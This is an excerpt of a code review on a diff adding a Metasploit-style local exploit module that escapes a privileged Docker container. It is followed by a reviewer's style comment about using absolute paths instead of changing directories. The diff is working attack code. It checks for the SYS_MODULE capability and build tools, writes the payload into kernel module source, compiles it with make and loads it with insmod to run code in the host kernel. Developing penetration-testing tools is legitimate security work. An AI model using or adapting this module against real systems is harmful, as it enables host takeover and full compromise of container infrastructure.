modules/exploits/linux/local/docker_privileged_container_kernel_escape.rb

```diff
@@ -0,0 +1,213 @@
+    unless capability_bitmask & 0x0000000000010000 > 0
+      return Exploit::CheckCode::Safe('SYS_MODULE Capability does not appear to be enabled')
+    end
+
+    # Check if kernel header folders exist
+    unless directory?("/lib/modules/#{kernel_release}/build")
+      return Exploit::CheckCode::Unknown("Kernel headers for this target do not appear to be installed. Attempt to install [gcc, make, linux-headers-#{kernel_release}] then retry check")
+    end
+
+    # Check that our required binaries are installed
+    unless command_exists?('insmod')
+      return Exploit::CheckCode::Unknown('insmod does not appear to be installed.')
+    end
+    unless command_exists?('make')
+      return Exploit::CheckCode::Unknown('make isnt installed on the system.')
+    end
+
+    CheckCode::Vulnerable('Inside Docker container and target appears vulnerable')
+  end
+
+  def exploit
+    # Check that container directory is writable
+    if directory?(datastore['WritableContainerDir']) && !writable?(datastore['WritableContainerDir'])
+      fail_with(Failure::BadConfig, "#{datastore['WritableContainerDir']} is not writable")
+    end
+
+    # Checking that kernel module isnt already running
+    if kernel_modules.include?(datastore['KernelModuleName'])
+      fail_with(Failure::BadConfig, "#{datastore['KernelModuleName']} is already loaded into the kernel. You may need to remove it manually.")
+    end
+
+    # Creating source files
+    print_status('Creating files')
+    mkdir(datastore['WritableContainerDir']) unless directory?(datastore['WritableContainerDir'])
+    cd(datastore['WritableContainerDir'])
+    write_kernel_source(datastore['KernelModuleName'], payload.encoded)
+    write_makefile(datastore['KernelModuleName'])
+    register_files_for_cleanup([
+      "#{datastore['KernelModuleName']}.c",
+      'Makefile'
+    ])
+
+    # Making exploit
+    print_status('Making kernel module')
+    results = cmd_exec('make')
+    vprint_status('Make results')
+    vprint_line(results)
+    register_files_for_cleanup([
+      'Module.symvers',
+      'modules.order',
+      "#{datastore['KernelModuleName']}.mod",
+      "#{datastore['KernelModuleName']}.mod.c",
+      "#{datastore['KernelModuleName']}.mod.o",
+      "#{datastore['KernelModuleName']}.o"
+    ])
+
+    # Checking if kernel file exists
+    unless file_exist?("#{datastore['KernelModuleName']}.ko")
+      fail_with(Failure::PayloadFailed, 'Kernel file did not compile. Run with verbose to see make errors.')
+    end
+    print_good('Kernel module compiled successfully')
+
+    # Loading module and running exploit
+    print_status('Loading kernel module')
+    results = cmd_exec("insmod #{datastore['KernelModuleName']}.ko")
+    vprint_status('Insmod results')
+    vprint_line(results)
+
+    # Leave temporary directory
+    cd('/')
+  end
+
+  def cleanup
+    # Go to the working directory
+    cd(datastore['WritableContainerDir'])
```

Comment:
Again, you should avoid needing to change the directory and instead use absolute paths.